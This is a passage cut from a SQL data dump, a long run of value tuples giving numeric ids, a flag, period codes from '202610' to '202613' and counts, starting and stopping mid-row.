,1,'202610',4),(4878,1,'202610',4),(4980,1,'202610',4),(5058,1,'202610',4),(5080,1,'202610',4),(5163,1,'202610',4),(5253,1,'202610',4),(5256,1,'202610',4),(5289,1,'202610',4),(5433,1,'202610',4),(5472,1,'202610',4),(5492,1,'202610',4),(5515,1,'202610',4),(5561,1,'202610',4),(5567,1,'202610',4),(5570,1,'202610',4),(5585,1,'202610',4),(485,1,'202610',5),(1584,1,'202610',5),(1598,1,'202610',5),(1728,1,'202610',5),(2658,1,'202610',5),(2748,1,'202610',5),(2809,1,'202610',5),(2956,1,'202610',5),(3006,1,'202610',5),(3027,1,'202610',5),(3038,1,'202610',5),(3079,1,'202610',5),(3102,1,'202610',5),(3313,1,'202610',5),(3479,1,'202610',5),(3710,1,'202610',5),(3738,1,'202610',5),(4275,1,'202610',5),(4301,1,'202610',5),(4323,1,'202610',5),(4368,1,'202610',5),(4396,1,'202610',5),(4408,1,'202610',5),(4454,1,'202610',5),(4551,1,'202610',5),(4582,1,'202610',5),(4612,1,'202610',5),(4648,1,'202610',5),(4660,1,'202610',5),(4694,1,'202610',5),(4697,1,'202610',5),(4703,1,'202610',5),(4893,1,'202610',5),(5028,1,'202610',5),(5131,1,'202610',5),(5153,1,'202610',5),(5157,1,'202610',5),(5259,1,'202610',5),(484,1,'202610',6),(1586,1,'202610',6),(1596,1,'202610',6),(1604,1,'202610',6),(1770,1,'202610',6),(2309,1,'202610',6),(2904,1,'202610',6),(3030,1,'202610',6),(3063,1,'202610',6),(3251,1,'202610',6),(3282,1,'202610',6),(3297,1,'202610',6),(3724,1,'202610',6),(3742,1,'202610',6),(3746,1,'202610',6),(4335,1,'202610',6),(4529,1,'202610',6),(4668,1,'202610',6),(4674,1,'202610',6),(4983,1,'202610',6),(5140,1,'202610',6),(5363,1,'202610',6),(5400,1,'202610',6),(5409,1,'202610',6),(5415,1,'202610',6),(5598,1,'202610',6),(5674,1,'202610',6),(467,1,'202610',7),(469,1,'202610',7),(473,1,'202610',7),(483,1,'202610',7),(1745,1,'202610',7),(1778,1,'202610',7),(2159,1,'202610',7),(2801,1,'202610',7),(3060,1,'202610',7),(3083,1,'202610',7),(3109,1,'202610',7),(3124,1,'202610',7),(3752,1,'202610',7),(4448,1,'202610',7),(5076,1,'202610',7),(5276,1,'202610',7),(5304,1,'202610',7),(5457,1,'202610',7),(5605,1,'202610',7),(5662,1,'202610',7),(5666,1,'202610',7),(5735,1,'202610',7),(5738,1,'202610',7),(472,1,'202610',8),(479,1,'202610',8),(480,1,'202610',8),(3127,1,'202610',8),(3259,1,'202610',8),(4326,1,'202610',8),(4329,1,'202610',8),(4436,1,'202610',8),(4977,1,'202610',8),(5307,1,'202610',8),(5441,1,'202610',8),(5461,1,'202610',8),(5700,1,'202610',8),(5771,1,'202610',8),(1608,1,'202610',9),(1614,1,'202610',9),(3023,1,'202610',9),(3097,1,'202610',9),(3749,1,'202610',9),(5353,1,'202610',9),(5374,1,'202610',9),(5464,1,'202610',9),(5601,1,'202610',9),(468,1,'202610',10),(481,1,'202610',10),(482,1,'202610',10),(570,1,'202610',10),(2297,1,'202610',10),(2813,1,'202610',10),(3290,1,'202610',10),(4677,1,'202610',10),(4776,1,'202610',10),(4802,1,'202610',10),(5264,1,'202610',10),(5428,1,'202610',10),(84,1,'202610',11),(335,1,'202610',11),(4722,1,'202610',11),(5134,1,'202610',11),(5378,1,'202610',11),(5397,1,'202610',11),(5436,1,'202610',11),(5489,1,'202610',11),(74,1,'202610',12),(474,1,'202610',12),(1780,1,'202610',12),(2558,1,'202610',12),(3090,1,'202610',12),(4520,1,'202610',12),(4759,1,'202610',12),(5412,1,'202610',12),(5502,1,'202610',12),(5578,1,'202610',12),(5769,1,'202610',12),(5778,1,'202610',12),(108,1,'202610',13),(2503,1,'202610',13),(2704,1,'202610',13),(5280,1,'202610',13),(5420,1,'202610',13),(1718,1,'202610',14),(1747,1,'202610',14),(87,1,'202610',15),(470,1,'202610',15),(2775,1,'202610',15),(5071,1,'202610',15),(5454,1,'202610',15),(5626,1,'202610',15),(1602,1,'202610',16),(5683,1,'202610',16),(3764,1,'202610',18),(91,1,'202610',19),(1544,1,'202610',19),(4930,1,'202610',19),(5593,1,'202610',19),(5696,1,'202610',20),(5762,1,'202610',23),(5785,1,'202610',23),(76,1,'202610',25),(5406,1,'202610',27),(89,1,'202610',30),(3781,1,'202610',32),(68,1,'202610',34),(72,1,'202610',36),(1582,1,'202610',39),(3541,1,'202610',46),(1741,1,'202610',49),(80,1,'202610',518),(9,1,'202610',4513),(1776,1,'202611',1),(2296,1,'202611',1),(2609,1,'202611',1),(3243,1,'202611',1),(4546,1,'202611',1),(5472,1,'202611',1),(110,1,'202611',2),(1720,1,'202611',2),(2165,1,'202611',2),(2751,1,'202611',2),(3097,1,'202611',2),(3257,1,'202611',2),(3278,1,'202611',2),(3531,1,'202611',2),(4357,1,'202611',2),(4582,1,'202611',2),(4663,1,'202611',2),(4862,1,'202611',2),(4988,1,'202611',2),(5028,1,'202611',2),(5042,1,'202611',2),(5046,1,'202611',2),(106,1,'202611',3),(1695,1,'202611',3),(1707,1,'202611',3),(1713,1,'202611',3),(1730,1,'202611',3),(2156,1,'202611',3),(3229,1,'202611',3),(3269,1,'202611',3),(3275,1,'202611',3),(3430,1,'202611',3),(3721,1,'202611',3),(4363,1,'202611',3),(4373,1,'202611',3),(4382,1,'202611',3),(4387,1,'202611',3),(4432,1,'202611',3),(4444,1,'202611',3),(4566,1,'202611',3),(4771,1,'202611',3),(4792,1,'202611',3),(4802,1,'202611',3),(5289,1,'202611',3),(1697,1,'202611',4),(1699,1,'202611',4),(2063,1,'202611',4),(2150,1,'202611',4),(2252,1,'202611',4),(3087,1,'202611',4),(3096,1,'202611',4),(3109,1,'202611',4),(3240,1,'202611',4),(3273,1,'202611',4),(3285,1,'202611',4),(3287,1,'202611',4),(3479,1,'202611',4),(3489,1,'202611',4),(3714,1,'202611',4),(4275,1,'202611',4),(4408,1,'202611',4),(4436,1,'202611',4),(4514,1,'202611',4),(4648,1,'202611',4),(4668,1,'202611',4),(4694,1,'202611',4),(4697,1,'202611',4),(4709,1,'202611',4),(4756,1,'202611',4),(4762,1,'202611',4),(4768,1,'202611',4),(4878,1,'202611',4),(4976,1,'202611',4),(5054,1,'202611',4),(5271,1,'202611',4),(5467,1,'202611',4),(1703,1,'202611',5),(1724,1,'202611',5),(1732,1,'202611',5),(1737,1,'202611',5),(1743,1,'202611',5),(1768,1,'202611',5),(1772,1,'202611',5),(2148,1,'202611',5),(2152,1,'202611',5),(2293,1,'202611',5),(2809,1,'202611',5),(2911,1,'202611',5),(3079,1,'202611',5),(3092,1,'202611',5),(3247,1,'202611',5),(3249,1,'202611',5),(3265,1,'202611',5),(3271,1,'202611',5),(3280,1,'202611',5),(3282,1,'202611',5),(3316,1,'202611',5),(3541,1,'202611',5),(3746,1,'202611',5),(4377,1,'202611',5),(4404,1,'202611',5),(4428,1,'202611',5),(4654,1,'202611',5),(4677,1,'202611',5),(4688,1,'202611',5),(4747,1,'202611',5),(4858,1,'202611',5),(4870,1,'202611',5),(4888,1,'202611',5),(5050,1,'202611',5),(5125,1,'202611',5),(5128,1,'202611',5),(5131,1,'202611',5),(5253,1,'202611',5),(5264,1,'202611',5),(5330,1,'202611',5),(5378,1,'202611',5),(1709,1,'202611',6),(1745,1,'202611',6),(1751,1,'202611',6),(2161,1,'202611',6),(2178,1,'202611',6),(2965,1,'202611',6),(2991,1,'202611',6),(3030,1,'202611',6),(3090,1,'202611',6),(3117,1,'202611',6),(3261,1,'202611',6),(3267,1,'202611',6),(3482,1,'202611',6),(3534,1,'202611',6),(3724,1,'202611',6),(3731,1,'202611',6),(4329,1,'202611',6),(4416,1,'202611',6),(4440,1,'202611',6),(4657,1,'202611',6),(4691,1,'202611',6),(4741,1,'202611',6),(5020,1,'202611',6),(5058,1,'202611',6),(5134,1,'202611',6),(5146,1,'202611',6),(5163,1,'202611',6),(5256,1,'202611',6),(5295,1,'202611',6),(5515,1,'202611',6),(480,1,'202611',7),(1705,1,'202611',7),(1711,1,'202611',7),(1739,1,'202611',7),(1741,1,'202611',7),(1749,1,'202611',7),(1770,1,'202611',7),(3027,1,'202611',7),(3072,1,'202611',7),(3259,1,'202611',7),(3313,1,'202611',7),(3438,1,'202611',7),(3727,1,'202611',7),(3752,1,'202611',7),(3771,1,'202611',7),(3777,1,'202611',7),(4323,1,'202611',7),(4326,1,'202611',7),(4335,1,'202611',7),(4338,1,'202611',7),(4368,1,'202611',7),(4391,1,'202611',7),(4412,1,'202611',7),(4424,1,'202611',7),(4524,1,'202611',7),(4529,1,'202611',7),(4681,1,'202611',7),(4685,1,'202611',7),(4700,1,'202611',7),(4703,1,'202611',7),(4753,1,'202611',7),(4866,1,'202611',7),(4897,1,'202611',7),(4983,1,'202611',7),(5122,1,'202611',7),(5137,1,'202611',7),(5140,1,'202611',7),(5301,1,'202611',7),(5356,1,'202611',7),(481,1,'202611',8),(1701,1,'202611',8),(1747,1,'202611',8),(1766,1,'202611',8),(1778,1,'202611',8),(2748,1,'202611',8),(2989,1,'202611',8),(3023,1,'202611',8),(3041,1,'202611',8),(3104,1,'202611',8),(3107,1,'202611',8),(3124,1,'202611',8),(3226,1,'202611',8),(3263,1,'202611',8),(3486,1,'202611',8),(3710,1,'202611',8),(3742,1,'202611',8),(3764,1,'202611',8),(4448,1,'202611',8),(4542,1,'202611',8),(4608,1,'202611',8),(4706,1,'202611',8),(4712,1,'202611',8),(4744,1,'202611',8),(4765,1,'202611',8),(4874,1,'202611',8),(4883,1,'202611',8),(5024,1,'202611',8),(5037,1,'202611',8),(5268,1,'202611',8),(5276,1,'202611',8),(5383,1,'202611',8),(5449,1,'202611',8),(5461,1,'202611',8),(5567,1,'202611',8),(5578,1,'202611',8),(478,1,'202611',9),(482,1,'202611',9),(1722,1,'202611',9),(1726,1,'202611',9),(1734,1,'202611',9),(2297,1,'202611',9),(3005,1,'202611',9),(3245,1,'202611',9),(3290,1,'202611',9),(3498,1,'202611',9),(4332,1,'202611',9),(4396,1,'202611',9),(4651,1,'202611',9),(4674,1,'202611',9),(4750,1,'202611',9),(5033,1,'202611',9),(5304,1,'202611',9),(5320,1,'202611',9),(5326,1,'202611',9),(5425,1,'202611',9),(5609,1,'202611',9),(5636,1,'202611',9),(483,1,'202611',10),(1590,1,'202611',10),(2154,1,'202611',10),(2248,1,'202611',10),(3006,1,'202611',10),(3034,1,'202611',10),(3038,1,'202611',10),(3066,1,'202611',10),(3069,1,'202611',10),(3307,1,'202611',10),(4420,1,'202611',10),(4517,1,'202611',10),(4551,1,'202611',10),(4556,1,'202611',10),(4645,1,'202611',10),(4776,1,'202611',10),(5101,1,'202611',10),(5153,1,'202611',10),(5314,1,'202611',10),(5323,1,'202611',10),(5359,1,'202611',10),(5409,1,'202611',10),(5412,1,'202611',10),(5512,1,'202611',10),(5585,1,'202611',10),(5605,1,'202611',10),(484,1,'202611',11),(1612,1,'202611',11),(1782,1,'202611',11),(2658,1,'202611',11),(2964,1,'202611',11),(3127,1,'202611',11),(3738,1,'202611',11),(4341,1,'202611',11),(4400,1,'202611',11),(4587,1,'202611',11),(4977,1,'202611',11),(5292,1,'202611',11),(102,1,'202611',12),(479,1,'202611',12),(1600,1,'202611',12),(1610,1,'202611',12),(1715,1,'202611',12),(2159,1,'202611',12),(2801,1,'202611',12),(2993,1,'202611',12),(3083,1,'202611',12),(3251,1,'202611',12),(3735,1,'202611',12),(3774,1,'202611',12),(4238,1,'202611',12),(4591,1,'202611',12),(4660,1,'202611',12),(5062,1,'202611',12),(5076,1,'202611',12),(5157,1,'202611',12),(5298,1,'202611',12),(5317,1,'202611',12),(472,1,'202611',13),(477,1,'202611',13),(488,1,'202611',13),(2457,1,'202611',13),(4520,1,'202611',13),(4980,1,'202611',13),(4996,1,'202611',13),(5334,1,'202611',13),(5464,1,'202611',13),(485,1,'202611',14),(3004,1,'202611',14),(4454,1,'202611',14),(4457,1,'202611',14),(4612,1,'202611',14),(4722,1,'202611',14),(5080,1,'202611',14),(5280,1,'202611',14),(5363,1,'202611',14),(5374,1,'202611',14),(5457,1,'202611',14),(5582,1,'202611',14),(476,1,'202611',15),(486,1,'202611',15),(1596,1,'202611',15),(1780,1,'202611',15),(2309,1,'202611',15),(2956,1,'202611',15),(3045,1,'202611',15),(3253,1,'202611',15),(5248,1,'202611',15),(5310,1,'202611',15),(5353,1,'202611',15),(5492,1,'202611',15),(5662,1,'202611',15),(5666,1,'202611',15),(5683,1,'202611',15),(1604,1,'202611',16),(3063,1,'202611',16),(3297,1,'202611',16),(3749,1,'202611',16),(4301,1,'202611',16),(5601,1,'202611',16),(5674,1,'202611',16),(1594,1,'202611',17),(1606,1,'202611',17),(1728,1,'202611',17),(2558,1,'202611',17),(5561,1,'202611',17),(5735,1,'202611',17),(1592,1,'202611',18),(1718,1,'202611',18),(2775,1,'202611',18),(5067,1,'202611',18),(5415,1,'202611',18),(5570,1,'202611',18),(5771,1,'202611',18),(2804,1,'202611',19),(5433,1,'202611',19),(5441,1,'202611',19),(5598,1,'202611',19),(2617,1,'202611',20),(2769,1,'202611',20),(5307,1,'202611',20),(5428,1,'202611',20),(5489,1,'202611',20),(469,1,'202611',21),(1608,1,'202611',21),(4759,1,'202611',21),(5259,1,'202611',21),(5400,1,'202611',21),(5436,1,'202611',21),(471,1,'202611',22),(570,1,'202611',22),(1584,1,'202611',22),(2813,1,'202611',22),(467,1,'202611',23),(5071,1,'202611',23),(5420,1,'202611',23),(5626,1,'202611',23),(487,1,'202611',24),(1598,1,'202611',24),(1544,1,'202611',25),(3102,1,'202611',25),(1614,1,'202611',26),(5738,1,'202611',26),(1586,1,'202611',27),(1588,1,'202611',27),(473,1,'202611',28),(2704,1,'202611',28),(5454,1,'202611',29),(5762,1,'202611',29),(74,1,'202611',31),(5778,1,'202611',31),(2503,1,'202611',32),(5700,1,'202611',32),(5769,1,'202611',32),(5785,1,'202611',34),(470,1,'202611',35),(5696,1,'202611',35),(3781,1,'202611',36),(4930,1,'202611',36),(5406,1,'202611',36),(5397,1,'202611',37),(5502,1,'202611',37),(335,1,'202611',38),(468,1,'202611',39),(87,1,'202611',40),(2904,1,'202611',40),(5593,1,'202611',41),(5816,1,'202611',41),(108,1,'202611',42),(474,1,'202611',43),(1582,1,'202611',45),(1602,1,'202611',48),(91,1,'202611',52),(68,1,'202611',57),(84,1,'202611',60),(89,1,'202611',62),(1774,1,'202611',62),(76,1,'202611',71),(72,1,'202611',88),(5821,1,'202611',90),(80,1,'202611',317),(3060,1,'202611',952),(9,1,'202611',5364),(3092,1,'202612',2),(4432,1,'202612',2),(4792,1,'202612',2),(5037,1,'202612',2),(1718,1,'202612',3),(3096,1,'202612',3),(3273,1,'202612',3),(3275,1,'202612',3),(4329,1,'202612',3),(4858,1,'202612',3),(1695,1,'202612',4),(1707,1,'202612',4),(1737,1,'202612',4),(1751,1,'202612',4),(2154,1,'202612',4),(2248,1,'202612',4),(2252,1,'202612',4),(2293,1,'202612',4),(2658,1,'202612',4),(3245,1,'202612',4),(3287,1,'202612',4),(3752,1,'202612',4),(4332,1,'202612',4),(4368,1,'202612',4),(4608,1,'202612',4),(4681,1,'202612',4),(4688,1,'202612',4),(4878,1,'202612',4),(4897,1,'202612',4),(5020,1,'202612',4),(5042,1,'202612',4),(5046,1,'202612',4),(5289,1,'202612',4),(106,1,'202612',5),(1697,1,'202612',5),(1709,1,'202612',5),(1720,1,'202612',5),(1782,1,'202612',5),(2063,1,'202612',5),(2156,1,'202612',5),(2161,1,'202612',5),(2296,1,'202612',5),(2748,1,'202612',5),(3229,1,'202612',5),(3243,1,'202612',5),(3247,1,'202612',5),(3257,1,'202612',5),(3278,1,'202612',5),(3285,1,'202612',5),(3316,1,'202612',5),(3541,1,'202612',5),(4275,1,'202612',5),(4382,1,'202612',5),(4404,1,'202612',5),(4428,1,'202612',5),(4514,1,'202612',5),(4657,1,'202612',5),(4888,1,'202612',5),(5054,1,'202612',5),(5058,1,'202612',5),(5295,1,'202612',5),(486,1,'202612',6),(1590,1,'202612',6),(1699,1,'202612',6),(1711,1,'202612',6),(1722,1,'202612',6),(1743,1,'202612',6),(1745,1,'202612',6),(1747,1,'202612',6),(2165,1,'202612',6),(2993,1,'202612',6),(3107,1,'202612',6),(3226,1,'202612',6),(3263,1,'202612',6),(3271,1,'202612',6),(3280,1,'202612',6),(3282,1,'202612',6),(3290,1,'202612',6),(3430,1,'202612',6),(3482,1,'202612',6),(4363,1,'202612',6),(4373,1,'202612',6),(4654,1,'202612',6),(4668,1,'202612',6),(4685,1,'202612',6),(4712,1,'202612',6),(4768,1,'202612',6),(4883,1,'202612',6),(4893,1,'202612',6),(5050,1,'202612',6),(5248,1,'202612',6),(5374,1,'202612',6),(5771,1,'202612',6),(478,1,'202612',7),(480,1,'202612',7),(488,1,'202612',7),(1713,1,'202612',7),(1732,1,'202612',7),(1749,1,'202612',7),(2178,1,'202612',7),(2751,1,'202612',7),(2991,1,'202612',7),(3066,1,'202612',7),(3109,1,'202612',7),(3127,1,'202612',7),(3249,1,'202612',7),(3261,1,'202612',7),(3265,1,'202612',7),(3267,1,'202612',7),(3307,1,'202612',7),(3313,1,'202612',7),(3498,1,'202612',7),(3727,1,'202612',7),(3746,1,'202612',7),(4326,1,'202612',7),(4357,1,'202612',7),(4416,1,'202612',7),(4517,1,'202612',7),(4551,1,'202612',7),(4677,1,'202612',7),(4747,1,'202612',7),(4756,1,'202612',7),(4765,1,'202612',7),(4797,1,'202612',7),(5122,1,'202612',7),(5125,1,'202612',7),(5140,1,'202612',7),(5292,1,'202612',7),(5412,1,'202612',7),(5425,1,'202612',7),(5467,1,'202612',7),(110,1,'202612',8),(476,1,'202612',8),(1768,1,'202612',8),(2297,1,'202612',8),(2989,1,'202612',8),(3005,1,'202612',8),(3072,1,'202612',8),(3079,1,'202612',8),(3090,1,'202612',8),(3097,1,'202612',8),(3104,1,'202612',8),(3240,1,'202612',8),(3531,1,'202612',8),(3534,1,'202612',8),(3714,1,'202612',8),(3771,1,'202612',8),(3777,1,'202612',8),(4412,1,'202612',8),(4424,1,'202612',8),(4457,1,'202612',8),(4582,1,'202612',8),(4648,1,'202612',8),(4674,1,'202612',8),(4709,1,'202612',8),(4741,1,'202612',8),(4771,1,'202612',8),(4802,1,'202612',8),(5067,1,'202612',8),(5163,1,'202612',8),(5256,1,'202612',8),(5264,1,'202612',8),(5301,1,'202612',8),(5304,1,'202612',8),(5317,1,'202612',8),(5363,1,'202612',8),(5378,1,'202612',8),(5472,1,'202612',8),(5605,1,'202612',8),(5626,1,'202612',8),(479,1,'202612',9),(481,1,'202612',9),(1604,1,'202612',9),(1703,1,'202612',9),(1730,1,'202612',9),(1739,1,'202612',9),(1770,1,'202612',9),(1772,1,'202612',9),(2152,1,'202612',9),(2609,1,'202612',9),(2809,1,'202612',9),(2911,1,'202612',9),(2964,1,'202612',9),(3063,1,'202612',9),(3087,1,'202612',9),(3251,1,'202612',9),(3486,1,'202612',9),(3721,1,'202612',9),(3735,1,'202612',9),(4238,1,'202612',9),(4323,1,'202612',9),(4338,1,'202612',9),(4396,1,'202612',9),(4444,1,'202612',9),(4546,1,'202612',9),(4660,1,'202612',9),(4694,1,'202612',9),(4703,1,'202612',9),(4706,1,'202612',9),(4750,1,'202612',9),(4983,1,'202612',9),(5024,1,'202612',9),(5134,1,'202612',9),(5157,1,'202612',9),(5314,1,'202612',9),(5323,1,'202612',9),(5582,1,'202612',9),(5683,1,'202612',9),(477,1,'202612',10),(484,1,'202612',10),(570,1,'202612',10),(1705,1,'202612',10),(1724,1,'202612',10),(1774,1,'202612',10),(1776,1,'202612',10),(2159,1,'202612',10),(3027,1,'202612',10),(3117,1,'202612',10),(3124,1,'202612',10),(3269,1,'202612',10),(3774,1,'202612',10),(4335,1,'202612',10),(4341,1,'202612',10),(4387,1,'202612',10),(4400,1,'202612',10),(4408,1,'202612',10),(4454,1,'202612',10),(4566,1,'202612',10),(4591,1,'202612',10),(4691,1,'202612',10),(4697,1,'202612',10),(4700,1,'202612',10),(4722,1,'202612',10),(4762,1,'202612',10),(4862,1,'202612',10),(4866,1,'202612',10),(5028,1,'202612',10),(5128,1,'202612',10),(5137,1,'202612',10),(5253,1,'202612',10),(5310,1,'202612',10),(5330,1,'202612',10),(5515,1,'202612',10),(5561,1,'202612',10),(5578,1,'202612',10),(5666,1,'202612',10),(482,1,'202612',11),(1715,1,'202612',11),(1734,1,'202612',11),(2148,1,'202612',11),(2150,1,'202612',11),(2956,1,'202612',11),(2965,1,'202612',11),(3041,1,'202612',11),(3438,1,'202612',11),(3710,1,'202612',11),(3738,1,'202612',11),(4301,1,'202612',11),(4391,1,'202612',11),(4440,1,'202612',11),(4529,1,'202612',11),(4651,1,'202612',11),(4663,1,'202612',11),(4870,1,'202612',11),(4988,1,'202612',11),(5062,1,'202612',11),(5131,1,'202612',11),(5271,1,'202612',11),(5449,1,'202612',11),(5674,1,'202612',11),(5735,1,'202612',11),(5785,1,'202612',11),(483,1,'202612',12),(1701,1,'202612',12),(1726,1,'202612',12),(2457,1,'202612',12),(2775,1,'202612',12),(3069,1,'202612',12),(3479,1,'202612',12),(3731,1,'202612',12),(4448,1,'202612',12),(4524,1,'202612',12),(4556,1,'202612',12),(4587,1,'202612',12),(4612,1,'202612',12),(4744,1,'202612',12),(4776,1,'202612',12),(4874,1,'202612',12),(4976,1,'202612',12),(5033,1,'202612',12),(5146,1,'202612',12),(5153,1,'202612',12),(5276,1,'202612',12),(5326,1,'202612',12),(5356,1,'202612',12),(5441,1,'202612',12),(5585,1,'202612',12),(5598,1,'202612',12),(5738,1,'202612',12),(102,1,'202612',13),(1592,1,'202612',13),(1600,1,'202612',13),(1741,1,'202612',13),(1766,1,'202612',13),(3023,1,'202612',13),(3749,1,'202612',13),(4420,1,'202612',13),(5071,1,'202612',13),(5334,1,'202612',13),(5353,1,'202612',13),(5359,1,'202612',13),(5567,1,'202612',13),(5609,1,'202612',13),(5636,1,'202612',13),(485,1,'202612',14),(487,1,'202612',14),(1584,1,'202612',14),(1594,1,'202612',14),(1596,1,'202612',14),(1608,1,'202612',14),(2558,1,'202612',14),(3030,1,'202612',14),(3038,1,'202612',14),(3045,1,'202612',14),(4759,1,'202612',14),(5320,1,'202612',14),(5409,1,'202612',14),(469,1,'202612',15),(1598,1,'202612',15),(2801,1,'202612',15),(3004,1,'202612',15),(3034,1,'202612',15),(3489,1,'202612',15),(4436,1,'202612',15),(5080,1,'202612',15),(5101,1,'202612',15),(5280,1,'202612',15),(5383,1,'202612',15),(5433,1,'202612',15),(5512,1,'202612',15),(5696,1,'202612',15),(1544,1,'202612',16),(1606,1,'202612',16),(2309,1,'202612',16),(2617,1,'202612',16),(3253,1,'202612',16),(4377,1,'202612',16),(4520,1,'202612',16),(5570,1,'202612',16),(5601,1,'202612',16),(5662,1,'202612',16),(5762,1,'202612',16),(5769,1,'202612',16),(5828,1,'202612',16),(1588,1,'202612',17),(1612,1,'202612',17),(3006,1,'202612',17),(3083,1,'202612',17),(3259,1,'202612',17),(4542,1,'202612',17),(4980,1,'202612',17),(4996,1,'202612',17),(5076,1,'202612',17),(5464,1,'202612',17),(5816,1,'202612',17),(5824,1,'202612',17),(471,1,'202612',18),(1728,1,'202612',18),(3764,1,'202612',18),(4753,1,'202612',18),(5268,1,'202612',18),(5298,1,'202612',18),(5415,1,'202612',18),(5428,1,'202612',18),(5492,1,'202612',18),(5778,1,'202612',18),(1586,1,'202612',19),(1610,1,'202612',19),(1778,1,'202612',19),(2769,1,'202612',19),(2904,1,'202612',19),(3742,1,'202612',19),(5461,1,'202612',19),(2813,1,'202612',20),(3102,1,'202612',20),(3297,1,'202612',20),(3724,1,'202612',20),(4645,1,'202612',20),(5307,1,'202612',20),(5400,1,'202612',20),(468,1,'202612',21),(4977,1,'202612',21),(5457,1,'202612',21),(5700,1,'202612',21),(84,1,'202612',22),(472,1,'202612',22),(335,1,'202612',23),(473,1,'202612',23),(2503,1,'202612',23),(4930,1,'202612',23),(5259,1,'202612',23),(5436,1,'202612',23),(5454,1,'202612',23),(2704,1,'202612',24),(2804,1,'202612',24),(108,1,'202612',25),(87,1,'202612',26),(467,1,'202612',26),(1602,1,'202612',26),(1614,1,'202612',26),(5489,1,'202612',26),(74,1,'202612',30),(470,1,'202612',30),(5593,1,'202612',30),(5502,1,'202612',31),(91,1,'202612',32),(3060,1,'202612',33),(474,1,'202612',35),(5420,1,'202612',35),(1582,1,'202612',41),(5821,1,'202612',41),(5406,1,'202612',42),(68,1,'202612',48),(3781,1,'202612',50),(76,1,'202612',54),(89,1,'202612',54),(72,1,'202612',55),(5397,1,'202612',55),(1780,1,'202612',88),(80,1,'202612',404),(9,1,'202612',4804),(106,1,'202613',2),(1604,1,'202613',3),(1732,1,'202613',3),(4703,1,'202613',3),(5024,1,'202613',3),(486,1,'202613',4),(1695,1,'202613',4),(1697,1,'202613',4),(1709,1,'202613',4),(2296,1,'202613',4),(3229,1,'202613',4),(3269,1,'202613',4),(3774,1,'202613',4),(3777,1,'202613',4),(4428,1,'202613',4),(4436,1,'202613',4),(4744,1,'202613',4),(4762,1,'202613',4),(4996,1,'202613',4),(5037,1,'202613',4),(5125,1,'202613',4),(5271,1,'202613',4),(5317,1,'202613',4),(5323,1,'202613',4),(478,1,'202613',5),(481,1,'202613',5),(488,1,'202613',5),(1592,1,'202613',5),(1751,1,'202613',5),(1772,1,'202613',5),(2150,1,'202613',5),(2152,1,'202613',5),(2161,1,'202613',5),(2617,1,'202613',5),(2911,1,'202613',5),(2991,1,'202613',5),(2993,1,'202613',5),(3005,1,'202613',5),(3092,1,'202613',5),(3097,1,'202613',5),(3240,1,'202613',5),(3249,1,'202613',5),(3259,1,'202613',5),(3263,1,'202613',5),(3280,1,'202613',5),(3282,1,'202613',5),(3746,1,'202613',5),(4323,1,'202613',5),(4332,1,'202613',5),(4373,1,'202613',5),(4387,1,'202613',5),(4440,1,'202613',5),(4651,1,'202613',5),(4654,1,'202613',5),(4878,1,'202613',5),(4988,1,'202613',5),(5058,1,'202613',5),(5131,1,'202613',5),(5140,1,'202613',5),(5314,1,'202613',5),(5326,1,'202613',5),(5353,1,'202613',5),(102,1,'202613',6),(476,1,'202613',6),(480,1,'202613',6),(485,1,'202613',6),(1699,1,'202613',6),(1730,1,'202613',6),(1741,1,'202613',6),(1747,1,'202613',6),(2154,1,'202613',6),(2156,1,'202613',6),(2248,1,'202613',6),(2252,1,'202613',6),(2748,1,'202613',6),(3027,1,'202613',6),(3034,1,'202613',6),(3038,1,'202613',6),(3045,1,'202613',6),(3096,1,'202613',6),(3124,1,'202613',6),(3247,1,'202613',6),(3257,1,'202613',6),(3273,1,'202613',6),(3275,1,'202613',6),(3287,1,'202613',6),(3290,1,'202613',6),(3486,1,'202613',6),(3489,1,'202613',6),(3724,1,'202613',6),(3771,1,'202613',6),(4275,1,'202613',6),(4335,1,'202613',6),(4338,1,'202613',6),(4341,1,'202613',6),(4404,1,'202613',6),(4432,1,'202613',6),(4444,1,'202613',6),(4457,1,'202613',6),(4517,1,'202613',6),(4546,1,'202613',6),(4582,1,'202613',6),(4681,1,'202613',6),(4706,1,'202613',6),(4765,1,'202613',6),(4771,1,'202613',6),(4792,1,'202613',6),(4862,1,'202613',6),(4870,1,'202613',6),(4883,1,'202613',6),(5020,1,'202613',6),(5046,1,'202613',6),(5050,1,'202613',6),(5101,1,'202613',6),(5253,1,'202613',6),(5276,1,'202613',6),(5295,1,'202613',6),(5301,1,'202613',6),(5304,1,'202613',6),(5310,1,'202613',6),(5412,1,'202613',6),(5582,1,'202613',6),(5683,1,'202613',6),(477,1,'202613',7),(479,1,'202613',7),(484,1,'202613',7),(1590,1,'202613',7),(1703,1,'202613',7),(1715,1,'202613',7),(1722,1,'202613',7),(1745,1,'202613',7),(1749,1,'202613',7),(2148,1,'202613',7),(2801,1,'202613',7),(3069,1,'202613',7),(3079,1,'202613',7),(3087,1,'202613',7),(3104,1,'202613',7),(3107,1,'202613',7),(3243,1,'202613',7),(3245,1,'202613',7),(3261,1,'202613',7),(3265,1,'202613',7),(3285,1,'202613',7),(3307,1,'202613',7),(3714,1,'202613',7),(4329,1,'202613',7),(4377,1,'202613',7),(4382,1,'202613',7),(4391,1,'202613',7),(4408,1,'202613',7),(4424,1,'202613',7),(4551,1,'202613',7),(4691,1,'202613',7),(4694,1,'202613',7),(4697,1,'202613',7),(4700,1,'202613',7),(4709,1,'202613',7),(4747,1,'202613',7),(4750,1,'202613',7),(4759,1,'202613',7),(4797,1,'202613',7),(4802,1,'202613',7),(4858,1,'202613',7),(5054,1,'202613',7),(5146,1,'202613',7),(5292,1,'202613',7),(5356,1,'202613',7),(5359,1,'202613',7),(5374,1,'202613',7),(5378,1,'202613',7),(5425,1,'202613',7),(5449,1,'202613',7),(5472,1,'202613',7),(5515,1,'202613',7),(5578,1,'202613',7),(483,1,'202613',8),(1606,1,'202613',8),(1713,1,'202613',8),(1720,1,'202613',8),(1726,1,'202613',8),(1737,1,'202613',8),(2159,1,'202613',8),(2165,1,'202613',8),(2178,1,'202613',8),(2293,1,'202613',8),(2809,1,'202613',8),(2964,1,'202613',8),(2965,1,'202613',8),(3030,1,'202613',8),(3072,1,'202613',8),(3109,1,'202613',8),(3117,1,'202613',8),(3226,1,'202613',8),(3430,1,'202613',8),(3541,1,'202613',8),(3731,1,'202613',8),(3735,1,'202613',8),(4396,1,'202613',8),(4448,1,'202613',8),(4514,1,'202613',8),(4542,1,'202613',8),(4677,1,'202613',8),(4712,1,'202613',8),(4753,1,'202613',8),(4893,1,'202613',8),(4897,1,'202613',8),(4976,1,